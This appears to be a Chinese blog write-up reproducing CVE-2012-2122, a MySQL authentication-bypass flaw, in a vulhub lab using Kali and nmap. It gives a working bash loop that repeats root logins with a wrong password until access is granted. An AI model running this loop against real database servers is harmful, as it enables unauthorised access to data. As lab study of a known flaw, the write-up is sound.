CVE-2012-2122-mysql未授权访问漏洞复现-vulhub

1.原理

参考:CVE-2012-2122 Mysql身份认证漏洞及利用-CSDN博客

简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入

使用:kali+vulhub

2.复现

开一下镜像,用的是vulhub,不了解的可以自己搜一下,网上相关安装挺多的

用ifconfig查一下受攻击机的ip地址

址查一下端口,看看是否正常打开了,发现有3306

用主机的nmap试了下扫描,直接扫端口是扫不到的,因为虚拟机开了防火墙,要-Pn,禁掉ping方式才可以扫到

for i in `seq 1 1000`; do mysql -u root --password=bad -h targetip 2>/dev/null; done(前面让你看的自己ip)

最后记得停止使用容器防止后续其他容器的打开

docker ps 展示所有正在使用的容器

docker stop +容器的id 关闭容器

相关推荐
2601_9626838922 分钟前
治理遗留系统中的“生肉 SQL”:一次用多模型协作优化慢查询的实战复盘
数据库·人工智能·sql
酱学编程1 小时前
【从零到一实现一个 AI Agent 框架 · 第四篇】04. 任务规划:拆解复杂目标 -
服务器·网络·数据库·人工智能
shushangyun_2 小时前
2026智能采购商城系统选型指南:如何引领企业数字化采购升级
java·大数据·数据库·人工智能·机器学习
华山令狐虫3 小时前
DBAPI AI 写 SQL:支持动态 SQL 与参数占位符,自然语言一键生成
数据库·人工智能·sql·dbapi
IvorySQL3 小时前
PG 技术日报|2026-07-04
数据库·人工智能·postgresql·开源
Hoxy.R4 小时前
KingbaseES读写分离高可用集群扩容、备库重建与故障切换实战
运维·数据库
IvorySQL4 小时前
IvorySQL HTAP 实时湖仓接入引擎
数据库·postgresql·开源·htap·ivorysql
忧郁的紫菜4 小时前
WCF+JSON+实体对象与WebService+DataSet效率大比拼
数据库·oracle·json
IvorySQL4 小时前
PostgreSQL 技术日报|2026-07-05
数据库·postgresql
万亿少女的梦1685 小时前
基于SpringBoot的考研学习交流系统设计与开发
spring boot·mysql·vue·系统设计·论坛系统